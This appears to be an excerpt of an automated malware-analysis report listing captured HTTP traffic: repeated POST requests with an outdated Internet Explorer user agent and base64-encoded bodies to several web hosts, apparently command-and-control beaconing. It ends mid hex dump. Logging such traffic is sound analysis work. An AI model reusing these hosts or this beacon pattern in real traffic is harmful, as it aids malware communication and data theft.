aRAJefzBE4xL84OipzVWKo/KMe2U3ryz8DJQYqxNzi2ABO2y0VTwY2EosGB114kDUZH7fk0AZ+FSc9FVgjhKfGhmztVfnw6Gm+v+2EMNvBeouHXFNI5AkEtU6uOGhXBYQ0bG9HylPIlBis/kziswAUZ8mCaLGlKJ8cAYAciPklQvlC85KBIvssEdZ+k6PLJUiHZWSkK4mZayuGHgXgzspaOohbe6J+j8SZIcjkwdXDlq0601KrTwZEXej9OdHz95i9yhSIw1aqNBiQuW8UDJEl332hQYC5c24sDRn2PmOfkO3zeLMRLf+Kt6GcIv660SowmFr/2b8ArxSPyCiep1g64JZpnvZc6rcF5KzWhHK5MmRt8fWDtIHpJXKvGKLauVSZLgM8PgKTdmz8htTxkY+50mEt6obuZvomL0xtgtIYHFVhDbVfnPMSPeIoMvxvpV/FkKyuybXFqDyDljtIbz8mBy0rhvNxLUK1O6N5XxPAQQC4+Whls/eX+tvV6ImQMhb87ICrffPuT0kPgUlGHdi1WRYY/8kO1iOWY292vOVSTbeoWqgX6DVNhfNC4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 34 4c 38 46 65 33 33 53 45 34 79 41 52 69 6b 69 4e 48 47 44 7a 62 59 4c 59 79 61 72 4d 7a 53 59 41 66 4d 33 78 32 6e 51 39 44 68 50 68 68 76 72 46 4c 6c 63 4d 43 76 78 30 32 45 64 6e 64 36 73 51 69 65 55 4a 5a 66 71 68 35 62 33 52 4a 57 2f 54 4c 78 4f 61 50 68 66 6a 45 41 6f 42 75 2f 37 37 43 41 70 73 2b 62 46 62 6b 47 62 6f 36 56 72 65 73 6f 58 66 44 68 32 70 6d 76 6d 78 55 62 39 6d 34 47 52 6e 5a 47 34 5a 53 64 77 57 77 77 74 48 50 44 32 67 33 58 35 47 32 51 69 37 55 2b 73 34 51 68 45 5a 4e 45 42 50 6b 72 75 62 59 6b 4f 51 6a 53 39 6b 64 58 57 57 77 52 6c 43 52 38 2b 35 30 47 44 6f 42 7a 44 4b 63 37 46 65 6f 62 6e 44 68 59 4f 74 55 34 62 42 43 43 49 59 68 4d 38 6f 4e 50 6d 37 45 5a 47 42 6d 53 48 64 53 39 6a 4c 37 6e 2f 64 37 45 2b 77 2f 45 46 65 51 55 47 4d 37 42 6c 53 75 37 47 6e 30 4d 44 46 6c 71 36 70 73 2b 6b 4d 39 2f 67 6d 67 72 77 51 44 77 42 78 50 6b 37 48 45 77 62 4f 37 56 4d 58 72 71 73 54 5a 45 41 4b 67 32 70 64 32 77 4e 68 6f 69 50 35 75 4e 47 45 31 35 79 31 75 38 76 2f 65 59 34 46 65 51 35 67 77 72 49 6b 71 57 63 42 6e 64 6f 62 46 46 32 70 64 32 62 7a 72 74 6c 38 4a 4c 4f 71 7a 2b 64 52 62 77 4e 66 51 61 77 59 58 4d 4f 30 56 73 64 6b 6b 4b 67 38 74 7a 5a 5a 4f 36 2f 51 39 35 79 53 78 4c 6b 61 65 68 43 57 67 6a 50 6f 41 54 4b 34 64 4a 42 72 65 52 76 75 4e 72 36 69 64 64 39 59 48 77 53 4b 4f 65 52 4c 43 31 7a 48 4f 6c 32 37 68 45 63 47 66 37 33 39 6b 52 45 67 49 79 42 69 50 77 63 58 56 72 6a 55 47 70 43 47 4a 63 66 61 4e 69 38 44 6e 36 63 36 48 78 36 79 55 65 66 44 30 38 30 74 38 78 48 6c 72 54 73 33 63 6a 32 70 79 39 70 57 6f 2f 42 6d 69 4b 4a 74 41 75 35 68 79 43 5a 71 51 6d 74 68 5a 4b 53 49 64 6e 70 6e 6a 55 53 49 53 4b 50 61 55 36 2b 30 6a 62 62 32 45 5a 59 75 41 6c 4b 47 75 63 50 43 33 64 7a 50 6d 59 57 48 41 32 5a 43 77 70 4b Data Ascii: 4L8Fe33SE4yARikiNHGDzbYLYyarMzSYAfM3x2nQ9DhPhhvrFLlcMCvx02Ednd6sQieUJZfqh5b3RJW/TLxOaPhfjEAoBu/77CAps+bFbkGbo6VresoXfDh2pmvmxUb9m4GRnZG4ZSdwWwwtHPD2g3X5G2Qi7U+s4QhEZNEBPkrubYkOQjS9kdXWWwRlCR8+50GDoBzDKc7FeobnDhYOtU4bBCCIYhM8oNPm7EZGBmSHdS9jL7n/d7E+w/EFeQUGM7BlSu7Gn0MDFlq6ps+kM9/gmgrwQDwBxPk7HEwbO7VMXrqsTZEAKg2pd2wNhoiP5uNGE15y1u8v/eY4FeQ5gwrIkqWcBndobFF2pd2bzrtl8JLOqz+dRbwNfQawYXMO0VsdkkKg8tzZZO6/Q95ySxLkaehCWgjPoATK4dJBreRvuNr6idd9YHwSKOeRLC1zHOl27hEcGf739kREgIyBiPwcXVrjUGpCGJcfaNi8Dn6c6Hx6yUefD080t8xHlrTs3cj2py9pWo/BmiKJtAu5hyCZqQmthZKSIdnpnjUSISKPaU6+0jbb2EZYuAlKGucPC3dzPmYWHA2ZCwpK
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 6b 68 56 6a 64 4e 72 36 41 6f 77 64 75 77 75 51 2f 59 7a 53 42 78 30 5a 48 6a 33 4b 45 33 2f 37 72 72 6f 4f 35 41 6a 74 73 70 53 51 30 34 71 72 50 4b 50 77 73 65 2f 33 4c 32 55 47 4f 2b 57 65 69 2f 63 71 33 74 76 38 38 63 79 42 43 6d 73 32 64 33 45 4b 39 69 34 54 45 2f 77 34 6d 68 65 78 76 38 38 45 44 2f 54 4b 42 73 44 74 39 7a 67 55 71 4a 33 6b 37 52 41 6e 64 6d 64 35 6a 4c 78 6b 6f 36 49 64 69 41 67 33 45 66 36 52 6f 2b 64 41 38 63 71 67 52 57 5a 62 39 6f 36 69 58 68 73 6a 6a 74 75 65 47 68 2b 47 77 42 30 65 43 67 39 4e 78 71 34 30 51 36 49 70 2f 47 4d 6e 58 63 6a 53 6c 55 41 48 32 61 52 77 42 61 77 72 74 61 4f 77 6e 2f 78 75 74 31 51 2f 4a 66 5a 61 45 6c 36 51 6f 33 61 68 6c 57 57 70 41 72 59 6e 53 73 63 45 53 4c 41 41 6b 47 42 33 39 50 69 56 63 30 75 34 73 4b 74 6d 6d 70 32 45 36 4c 43 37 74 30 4b 46 77 69 4a 6e 36 43 49 4c 53 42 36 37 52 66 30 78 36 4d 7a 39 6c 2b 36 48 4c 65 4b 56 32 59 2b 64 6f 4c 78 70 2b 49 63 56 66 31 41 48 34 45 74 44 66 45 77 5a 6f 44 30 68 71 48 78 7a 76 56 4f 45 6b 56 59 57 57 51 46 50 47 45 63 47 32 5a 58 50 43 39 59 58 48 50 4d 37 2b 4a 6a 65 73 65 6c 4f 6d 72 79 4a 65 70 6e 31 4b 57 54 2f 79 6c 6b 49 32 78 55 4b 6a 41 4a 6b 43 6d 2b 6d 42 46 6c 36 4f 2b 7a 65 6c 55 4d 50 31 7a 2b 42 38 50 71 49 35 56 79 4e 57 56 42 68 32 4b 34 33 44 79 37 42 59 4b 4f 4d 56 72 64 69 47 41 36 30 4e 53 34 76 74 47 7a 36 46 34 72 52 56 42 6d 53 62 46 51 6a 6a 77 33 35 4a 63 4d 32 66 73 47 51 4f 2f 46 48 64 50 5a 51 5a 79 55 70 79 2f 4b 7a 56 55 71 72 68 73 43 51 48 53 48 43 78 36 75 36 6d 6d 47 64 63 48 36 6f 72 31 36 6e 4c 47 52 6e 41 61 6b 67 74 44 45 38 5a 69 51 55 6a 78 4a 2f 6c 6b 5a 52 45 6f 71 2b 37 43 4d 72 41 31 43 6f 65 4e 43 72 72 36 2f 44 44 79 50 33 7a 36 6a 44 39 2b 65 34 54 53 2f 75 78 77 3d 3d Data Ascii: khVjdNr6AowduwuQ/YzSBx0ZHj3KE3/7rroO5AjtspSQ04qrPKPwse/3L2UGO+Wei/cq3tv88cyBCms2d3EK9i4TE/w4mhexv88ED/TKBsDt9zgUqJ3k7RAndmd5jLxko6IdiAg3Ef6Ro+dA8cqgRWZb9o6iXhsjjtueGh+GwB0eCg9Nxq40Q6Ip/GMnXcjSlUAH2aRwBawrtaOwn/xut1Q/JfZaEl6Qo3ahlWWpArYnSscESLAAkGB39PiVc0u4sKtmmp2E6LC7t0KFwiJn6CILSB67Rf0x6Mz9l+6HLeKV2Y+doLxp+IcVf1AH4EtDfEwZoD0hqHxzvVOEkVYWWQFPGEcG2ZXPC9YXHPM7+JjeselOmryJepn1KWT/ylkI2xUKjAJkCm+mBFl6O+zelUMP1z+B8PqI5VyNWVBh2K43Dy7BYKOMVrdiGA60NS4vtGz6F4rRVBmSbFQjjw35JcM2fsGQO/FHdPZQZyUpy/KzVUqrhsCQHSHCx6u6mmGdcH6or16nLGRnAakgtDE8ZiQUjxJ/lkZREoq+7CMrA1CoeNCrr6/DDyP3z6jD9+e4TS/uxw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 34 4c 38 46 65 33 33 53 45 34 79 41 52 69 6b 69 4e 48 47 44 7a 62 59 4c 59 79 61 72 4d 7a 53 59 41 66 4d 33 78 32 6e 51 39 44 68 50 68 68 76 72 46 4c 6c 63 4d 43 76 78 30 32 45 64 6e 64 36 73 51 69 65 55 4a 5a 66 71 68 35 62 33 52 4a 57 2f 54 4c 78 4f 61 50 68 66 6a 45 41 6f 42 75 2f 37 37 43 41 70 73 2b 62 46 62 6b 47 62 6f 36 56 72 65 73 6f 58 66 44 68 32 70 6d 76 6d 78 55 62 39 6d 34 47 52 6e 5a 47 34 5a 53 64 77 57 77 77 74 48 50 44 32 67 33 58 35 47 32 51 69 37 55 2b 73 34 51 68 45 5a 4e 45 42 50 6b 72 75 62 59 6b 4f 51 6a 53 39 6b 64 58 57 57 77 52 6c 43 52 38 2b 35 30 47 44 6f 42 7a 44 4b 63 37 46 65 6f 62 6e 44 68 59 4f 74 55 34 62 42 43 43 49 59 68 4d 38 6f 4e 50 6d 37 45 5a 47 42 6d 53 48 64 53 39 6a 4c 37 6e 2f 64 37 45 2b 77 2f 45 46 65 51 55 47 4d 37 42 6c 53 75 37 47 6e 30 4d 44 46 6c 71 36 70 73 2b 6b 4d 39 2f 67 6d 67 72 77 51 44 77 42 78 50 6b 37 48 45 77 62 4f 37 56 4d 58 72 71 73 54 5a 45 41 4b 67 32 70 64 32 77 4e 68 6f 69 50 35 75 4e 47 45 31 35 79 31 75 38 76 2f 65 59 34 46 65 51 35 67 77 72 49 6b 71 57 63 42 6e 64 6f 62 46 46 32 70 64 32 62 7a 72 74 6c 38 4a 4c 4f 71 7a 2b 64 52 62 77 4e 66 51 61 77 59 58 4d 4f 30 56 73 64 6b 6b 4b 67 38 74 7a 5a 5a 4f 36 2f 51 39 35 79 53 78 4c 6b 61 65 68 43 57 67 6a 50 6f 41 54 4b 34 64 4a 42 72 65 52 76 75 4e 72 36 69 64 64 39 59 48 77 53 4b 4f 65 52 4c 43 31 7a 48 4f 6c 32 37 68 45 63 47 66 37 33 39 6b 52 45 67 49 79 42 69 50 77 63 58 56 72 6a 55 47 70 43 47 4a 63 66 61 4e 69 38 44 6e 36 63 36 48 78 36 79 55 65 66 44 30 38 30 74 38 78 48 6c 72 54 73 33 63 6a 32 70 79 39 70 57 6f 2f 42 6d 69 4b 4a 74 41 75 35 68 79 43 5a 71 51 6d 74 68 5a 4b 53 49 64 6e 70 6e 6a 55 53 49 53 4b 50 61 55 36 2b 30 6a 62 62 32 45 5a 59 75 41 6c 4b 47 75 63 50 43 33 64 7a 50 6d 59 57 48 41 32 5a 43 77 70 4b Data Ascii: 4L8Fe33SE4yARikiNHGDzbYLYyarMzSYAfM3x2nQ9DhPhhvrFLlcMCvx02Ednd6sQieUJZfqh5b3RJW/TLxOaPhfjEAoBu/77CAps+bFbkGbo6VresoXfDh2pmvmxUb9m4GRnZG4ZSdwWwwtHPD2g3X5G2Qi7U+s4QhEZNEBPkrubYkOQjS9kdXWWwRlCR8+50GDoBzDKc7FeobnDhYOtU4bBCCIYhM8oNPm7EZGBmSHdS9jL7n/d7E+w/EFeQUGM7BlSu7Gn0MDFlq6ps+kM9/gmgrwQDwBxPk7HEwbO7VMXrqsTZEAKg2pd2wNhoiP5uNGE15y1u8v/eY4FeQ5gwrIkqWcBndobFF2pd2bzrtl8JLOqz+dRbwNfQawYXMO0VsdkkKg8tzZZO6/Q95ySxLkaehCWgjPoATK4dJBreRvuNr6idd9YHwSKOeRLC1zHOl27hEcGf739kREgIyBiPwcXVrjUGpCGJcfaNi8Dn6c6Hx6yUefD080t8xHlrTs3cj2py9pWo/BmiKJtAu5hyCZqQmthZKSIdnpnjUSISKPaU6+0jbb2EZYuAlKGucPC3dzPmYWHA2ZCwpK
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 61 2f 76 50 65 73 48 51 45 34 7a 62 73 77 31 4b 6f 48 4e 32 6f 5a 70 57 6f 75 41 2f 61 59 61 56 68 52 50 4a 56 79 74 76 56 43 4d 32 67 42 65 73 51 45 50 46 51 74 63 67 6d 41 41 75 70 77 65 6b 66 50 35 50 74 5a 75 78 33 63 5a 44 6b 36 74 62 66 4a 72 6b 41 46 6a 6c 75 61 48 42 52 56 77 31 6f 77 45 70 41 72 53 39 46 55 56 72 41 47 37 6e 55 6a 49 4d 62 45 64 70 2b 4e 63 65 53 61 31 7a 6f 61 51 6a 53 70 58 68 37 63 6b 54 4e 41 50 61 34 48 59 79 74 6e 57 6b 78 37 47 31 4b 53 61 5a 72 6f 74 41 79 4c 53 39 47 67 49 57 47 56 7a 35 35 51 31 6b 6e 37 6e 6f 4f 52 36 35 56 38 59 55 54 6e 4a 37 42 42 31 5a 50 70 4f 37 6b 5a 47 4c 4d 49 6e 4c 5a 52 53 6f 62 53 53 4b 75 55 45 74 4b 67 32 51 4d 50 72 52 46 69 57 65 69 6d 47 51 59 71 46 7a 73 7a 35 41 64 54 2f 69 50 65 48 38 71 6c 57 47 4a 61 37 62 35 6f 41 6f 75 44 53 39 79 45 74 62 6c 47 37 6b 4f 6a 36 64 79 71 41 70 64 32 46 4a 44 71 38 52 77 65 6a 76 42 2f 54 73 50 62 36 4a 54 4e 44 63 6c 32 42 45 6c 41 32 4f 4a 32 42 59 6e 2f 59 4a 6b 77 31 54 74 52 4c 44 78 42 2b 42 44 46 69 56 39 50 57 2b 38 47 76 4c 58 34 52 43 57 35 37 6f 44 4b 72 6b 72 6b 53 54 53 46 36 6b 6b 77 55 77 79 6a 56 67 59 56 35 53 2b 76 73 74 48 63 51 6b 35 50 33 38 55 55 38 6a 66 71 48 79 55 74 6d 77 43 6b 2b 4c 4b 79 6e 72 55 36 68 71 78 64 6f 4c 4b 39 42 75 73 61 34 74 67 66 48 4f 36 78 47 33 38 75 59 33 48 51 58 4e 58 42 35 50 42 64 2f 65 53 2f 4c 66 46 6e 76 79 36 4d 76 75 4f 44 70 76 49 75 70 33 6b 4e 65 6a 58 76 39 36 31 4f 67 2f 6c 5a 62 48 68 4b 4d 62 6b 30 58 33 49 57 79 68 58 46 71 4d 73 34 51 79 36 30 66 55 2b 75 41 78 42 62 45 7a 4e 48 74 74 34 79 73 6e 44 39 6a 46 43 4e 4e 30 70 77 6b 30 36 32 4a 4f 39 69 68 37 6e 69 52 56 57 30 2f 6a 63 61 68 2b 67 5a 4e 50 30 44 6a 4d 70 42 54 66 35 55 38 4c 31 44 52 66 52 79 6b 3d Data Ascii: a/vPesHQE4zbsw1KoHN2oZpWouA/aYaVhRPJVytvVCM2gBesQEPFQtcgmAAupwekfP5PtZux3cZDk6tbfJrkAFjluaHBRVw1owEpArS9FUVrAG7nUjIMbEdp+NceSa1zoaQjSpXh7ckTNAPa4HYytnWkx7G1KSaZrotAyLS9GgIWGVz55Q1kn7noOR65V8YUTnJ7BB1ZPpO7kZGLMInLZRSobSSKuUEtKg2QMPrRFiWeimGQYqFzsz5AdT/iPeH8qlWGJa7b5oAouDS9yEtblG7kOj6dyqApd2FJDq8RwejvB/TsPb6JTNDcl2BElA2OJ2BYn/YJkw1TtRLDxB+BDFiV9PW+8GvLX4RCW57oDKrkrkSTSF6kkwUwyjVgYV5S+vstHcQk5P38UU8jfqHyUtmwCk+LKynrU6hqxdoLK9Busa4tgfHO6xG38uY3HQXNXB5PBd/eS/LfFnvy6MvuODpvIup3kNejXv961Og/lZbHhKMbk0X3IWyhXFqMs4Qy60fU+uAxBbEzNHtt4ysnD9jFCNN0pwk062JO9ih7niRVW0/jcah+gZNP0DjMpBTf5U8L1DRfRyk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 66 68 56 55 50 56 79 42 43 59 78 6f 47 4b 6e 6b 68 79 31 78 78 4f 2b 63 4d 37 52 30 73 5a 35 35 55 44 69 52 38 46 2f 33 43 58 75 43 45 47 43 72 33 61 68 65 55 59 57 6f 6a 42 6d 33 38 71 37 46 4c 6e 62 7a 55 39 49 49 6e 4e 73 34 6f 4b 76 64 47 44 50 52 58 6e 2f 43 43 34 70 4b 33 44 76 70 56 49 6c 48 66 41 73 51 66 36 68 72 31 34 6f 55 39 6b 76 46 78 74 6e 56 67 43 69 74 5a 72 58 59 48 50 46 2b 79 76 76 59 78 44 4b 31 2f 6b 31 4b 46 33 43 6b 2f 4f 77 78 65 44 56 44 48 42 48 4d 6b 45 47 72 42 46 7a 30 50 31 36 4a 6f 6d 55 63 68 56 2f 63 7a 56 7a 4e 35 64 55 36 44 72 78 4e 79 4f 71 66 4c 6e 6b 61 6f 6e 6a 39 71 39 45 56 32 50 43 34 64 70 49 4a 71 6d 58 2f 57 32 41 64 64 72 6b 49 49 74 4a 69 63 32 37 55 6a 6b 77 49 63 55 49 35 75 36 39 77 37 46 65 65 4c 52 2f 79 6c 38 4d 31 70 53 59 55 2f 31 44 66 39 62 44 39 6f 59 73 54 42 6b 36 36 59 66 45 57 45 37 70 57 71 49 58 51 38 6d 6d 74 50 50 78 31 71 44 73 50 5a 73 6d 33 6e 50 58 67 42 66 41 31 43 6f 37 7a 4e 69 6a 4e 69 66 33 63 76 2f 64 51 55 54 74 2b 32 73 48 79 47 49 77 64 59 74 70 4d 69 6c 6e 6a 39 4b 6e 6c 5a 49 7a 52 69 37 4d 39 4c 59 61 58 67 62 56 65 63 46 39 71 4d 53 4e 4c 64 51 57 31 7a 7a 2b 48 39 50 41 52 52 6d 4e 58 6a 49 74 76 55 38 75 31 76 46 64 42 64 64 59 48 66 70 50 4d 76 4c 46 46 5a 78 35 37 68 4a 46 77 4e 65 2f 6f 69 58 68 38 71 68 5a 56 63 57 6f 38 46 6e 61 58 38 6e 55 63 72 6d 66 39 44 37 74 51 4a 5a 37 38 74 32 4e 44 39 4f 57 33 46 30 51 61 6f 52 72 64 70 64 72 45 74 68 4b 69 6e 41 77 45 47 38 47 74 62 47 61 77 48 36 7a 48 45 62 30 30 73 30 43 55 35 73 33 36 7a 6c 51 52 6e 52 38 70 48 6c 7a 6e 46 44 63 5a 78 58 62 62 75 77 30 71 71 66 6a 79 77 49 43 4e 4d 74 33 44 73 59 4b 52 59 45 7a 75 58 53 72 6a 78 43 4a 66 79 2f 6c 4d 72 35 30 46 2b 6e 42 76 43 52 34 31 68 64 75 58 Data Ascii: fhVUPVyBCYxoGKnkhy1xxO+cM7R0sZ55UDiR8F/3CXuCEGCr3aheUYWojBm38q7FLnbzU9IInNs4oKvdGDPRXn/CC4pK3DvpVIlHfAsQf6hr14oU9kvFxtnVgCitZrXYHPF+yvvYxDK1/k1KF3Ck/OwxeDVDHBHMkEGrBFz0P16JomUchV/czVzN5dU6DrxNyOqfLnkaonj9q9EV2PC4dpIJqmX/W2AddrkIItJic27UjkwIcUI5u69w7FeeLR/yl8M1pSYU/1Df9bD9oYsTBk66YfEWE7pWqIXQ8mmtPPx1qDsPZsm3nPXgBfA1Co7zNijNif3cv/dQUTt+2sHyGIwdYtpMilnj9KnlZIzRi7M9LYaXgbVecF9qMSNLdQW1zz+H9PARRmNXjItvU8u1vFdBddYHfpPMvLFFZx57hJFwNe/oiXh8qhZVcWo8FnaX8nUcrmf9D7tQJZ78t2ND9OW3F0QaoRrdpdrEthKinAwEG8GtbGawH6zHEb00s0CU5s36zlQRnR8pHlznFDcZxXbbuw0qqfjywICNMt3DsYKRYEzuXSrjxCJfy/lMr50F+nBvCR41hduX
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 53 4b 52 47 71 44 48 72 4a 59 7a 6a 64 68 35 6a 55 47 72 61 62 59 6f 4b 6c 6b 5a 76 72 41 64 76 39 57 54 56 4a 6a 4a 2b 58 68 55 7a 52 52 37 57 55 66 6b 79 79 43 72 6b 6f 69 43 63 61 48 47 50 54 55 70 30 77 6a 45 63 4c 33 46 6a 53 31 63 79 4b 77 72 43 48 54 55 76 52 55 66 44 63 58 77 76 61 59 49 4f 42 33 6d 34 58 61 32 68 46 64 72 66 58 47 73 70 71 2f 4d 77 32 41 71 44 79 76 47 34 42 37 2b 4b 2b 45 72 57 74 35 58 77 36 58 7a 6f 6a 37 58 45 63 73 47 48 30 42 43 38 32 4b 39 47 49 75 5a 42 51 63 41 79 43 62 68 66 49 4e 62 42 76 52 61 32 4b 53 6e 38 7a 70 34 4e 32 78 55 52 42 61 36 46 31 6b 69 63 79 58 66 62 30 43 38 6e 66 68 76 6e 37 35 59 6c 47 6a 6a 58 4b 42 47 51 52 61 46 2b 79 70 62 54 59 64 71 33 4b 77 6f 73 34 73 34 4d 45 63 6c 59 59 66 76 4b 34 79 50 47 54 2b 56 53 4c 77 6e 74 72 51 46 76 39 79 35 38 44 44 6b 4e 43 69 75 56 61 43 57 77 6f 69 56 56 4e 5a 55 65 58 6a 74 61 35 72 4c 54 6d 58 6c 31 4e 69 39 39 79 79 6d 58 39 70 47 71 73 4e 73 51 65 54 61 33 41 2f 54 71 52 7a 70 6e 64 65 42 30 50 36 7a 51 49 6b 54 6f 44 42 68 7a 53 70 50 47 37 4e 56 58 59 55 61 54 77 75 79 2f 77 35 78 63 32 63 44 61 4b 42 33 50 59 69 35 79 42 4b 49 36 57 37 64 41 32 42 47 6d 63 68 42 53 6b 43 6b 5a 38 63 4d 36 6d 4b 37 43 51 77 77 61 72 62 59 6b 53 2b 50 6c 54 78 47 6f 30 59 6f 64 34 55 74 72 37 63 35 48 62 37 4b 46 6f 47 58 4f 35 6d 51 65 46 72 32 43 33 5a 73 65 65 68 6d 74 4e 68 77 4f 73 67 6c 69 4d 56 44 4a 36 56 37 43 6d 6f 36 4b 68 6d 4c 32 59 70 41 59 37 78 41 2b 66 2f 36 5a 66 62 4e 5a 47 45 77 6a 46 4c 42 33 54 38 4e 43 64 4a 56 45 32 78 74 65 4d 4b 36 65 35 34 33 4a 59 75 4f 75 6c 67 3d 3d Data Ascii: SKRGqDHrJYzjdh5jUGrabYoKlkZvrAdv9WTVJjJ+XhUzRR7WUfkyyCrkoiCcaHGPTUp0wjEcL3FjS1cyKwrCHTUvRUfDcXwvaYIOB3m4Xa2hFdrfXGspq/Mw2AqDyvG4B7+K+ErWt5Xw6Xzoj7XEcsGH0BC82K9GIuZBQcAyCbhfINbBvRa2KSn8zp4N2xURBa6F1kicyXfb0C8nfhvn75YlGjjXKBGQRaF+ypbTYdq3Kwos4s4MEclYYfvK4yPGT+VSLwntrQFv9y58DDkNCiuVaCWwoiVVNZUeXjta5rLTmXl1Ni99yymX9pGqsNsQeTa3A/TqRzpndeB0P6zQIkToDBhzSpPG7NVXYUaTwuy/w5xc2cDaKB3PYi5yBKI6W7dA2BGmchBSkCkZ8cM6mK7CQwwarbYkS+PlTxGo0Yod4Utr7c5Hb7KFoGXO5mQeFr2C3ZseehmtNhwOsgliMVDJ6V7Cmo6KhmL2YpAY7xA+f/6ZfbNZGEwjFLB3T8NCdJVE2xteMK6e543JYuOulg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 30 2b 78 57 48 71 33 41 4b 59 78 44 72 43 70 64 70 4b 6f 33 7a 6d 61 46 39 6f 43 62 74 66 55 37 4d 54 52 41 34 76 43 35 53 75 75 57 76 70 39 78 67 30 50 4b 71 4c 37 4c 45 72 7a 67 2f 2b 52 32 78 66 39 78 77 6a 41 4e 39 30 30 30 4b 46 56 31 36 54 59 66 70 62 36 34 6d 67 4b 6f 55 64 61 76 31 63 70 63 37 32 77 6f 67 4d 57 45 59 4b 36 68 53 75 45 44 65 79 48 4a 76 59 78 38 52 6d 2f 67 53 53 78 58 75 55 31 42 46 33 43 53 6e 2f 62 58 5a 49 75 34 59 4b 2b 77 41 46 69 57 49 50 79 71 64 35 73 72 74 2f 7a 6c 30 69 6d 2f 56 69 41 76 76 48 35 76 61 46 54 73 5a 53 4e 38 43 57 34 65 70 47 38 51 37 51 7a 4f 4e 67 79 66 44 41 63 54 6c 2f 75 67 46 36 64 61 70 46 65 46 44 41 57 62 56 64 62 76 47 67 53 2f 39 74 51 68 71 68 59 44 54 33 4f 71 31 41 6f 69 41 55 39 45 62 34 58 6c 65 79 54 6b 64 69 4c 61 6b 73 50 71 47 69 36 51 33 68 33 76 70 4c 65 78 52 44 65 6d 65 69 70 77 55 6d 45 4c 52 33 65 57 37 72 6a 4e 46 30 4f 43 39 68 78 44 42 6d 59 38 51 65 55 67 79 78 4c 46 79 56 62 66 4a 72 59 4b 4d 6c 4b 49 52 59 55 42 70 54 42 68 4b 58 42 63 48 55 4a 4c 4e 47 78 79 71 66 69 48 41 6e 6d 50 30 6c 6d 49 41 77 4c 54 68 6c 78 4a 6b 57 6e 6f 39 4a 74 71 71 31 48 59 48 57 4d 53 6b 66 31 66 6c 37 68 79 44 4e 76 30 37 45 74 78 31 2f 41 46 48 75 4a 4f 79 62 31 72 52 4f 78 44 35 48 4d 62 41 71 32 41 38 2b 76 33 69 62 2f 6a 46 41 6e 55 56 41 37 48 49 4b 33 72 64 71 68 33 33 41 4c 54 33 41 47 66 64 46 58 50 73 2b 64 37 72 53 57 52 6e 43 58 6c 50 33 67 79 54 39 68 63 2b 6f 67 43 56 61 39 55 68 78 30 6e 34 30 58 54 39 66 70 4a 6b 67 48 69 6e 4a 77 6c 58 42 52 76 54 6b 33 56 69 77 30 73 76 37 39 66 78 4d 2b 51 6e 32 50 4b 72 35 38 57 64 32 6e 6e 43 4d 45 4e 2b 76 56 7a 45 78 57 2b 39 6d 35 4f 6c 65 38 3d Data Ascii: 0+xWHq3AKYxDrCpdpKo3zmaF9oCbtfU7MTRA4vC5SuuWvp9xg0PKqL7LErzg/+R2xf9xwjAN9000KFV16TYfpb64mgKoUdav1cpc72wogMWEYK6hSuEDeyHJvYx8Rm/gSSxXuU1BF3CSn/bXZIu4YK+wAFiWIPyqd5srt/zl0im/ViAvvH5vaFTsZSN8CW4epG8Q7QzONgyfDAcTl/ugF6dapFeFDAWbVdbvGgS/9tQhqhYDT3Oq1AoiAU9Eb4XleyTkdiLaksPqGi6Q3h3vpLexRDemeipwUmELR3eW7rjNF0OC9hxDBmY8QeUgyxLFyVbfJrYKMlKIRYUBpTBhKXBcHUJLNGxyqfiHAnmP0lmIAwLThlxJkWno9Jtqq1HYHWMSkf1fl7hyDNv07Etx1/AFHuJOyb1rROxD5HMbAq2A8+v3ib/jFAnUVA7HIK3rdqh33ALT3AGfdFXPs+d7rSWRnCXlP3gyT9hc+ogCVa9Uhx0n40XT9fpJkgHinJwlXBRvTk3Viw0sv79fxM+Qn2PKr58Wd2nnCMEN+vVzExW+9m5Ole8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 73 4e 4e 31 70 32 76 6b 4a 59 77 6a 59 59 69 4d 51 69 37 52 77 64 52 6c 30 76 34 78 66 30 6f 6d 7a 2b 51 66 39 37 56 34 4a 72 6f 74 5a 44 69 44 72 6f 74 6d 4b 38 4e 4c 47 34 34 2b 38 32 47 32 2f 73 36 75 35 7a 47 48 5a 68 56 76 72 62 37 78 36 5a 67 2f 32 6d 33 77 4a 35 4b 63 49 58 2b 55 38 56 48 69 4f 77 66 5a 39 63 4f 6e 2f 73 5a 6c 6b 5a 75 6b 63 6e 6c 52 39 38 61 71 54 6c 73 58 46 52 46 41 2f 57 4d 69 77 44 53 65 45 38 51 64 61 47 38 69 57 69 35 44 4e 6f 4a 46 45 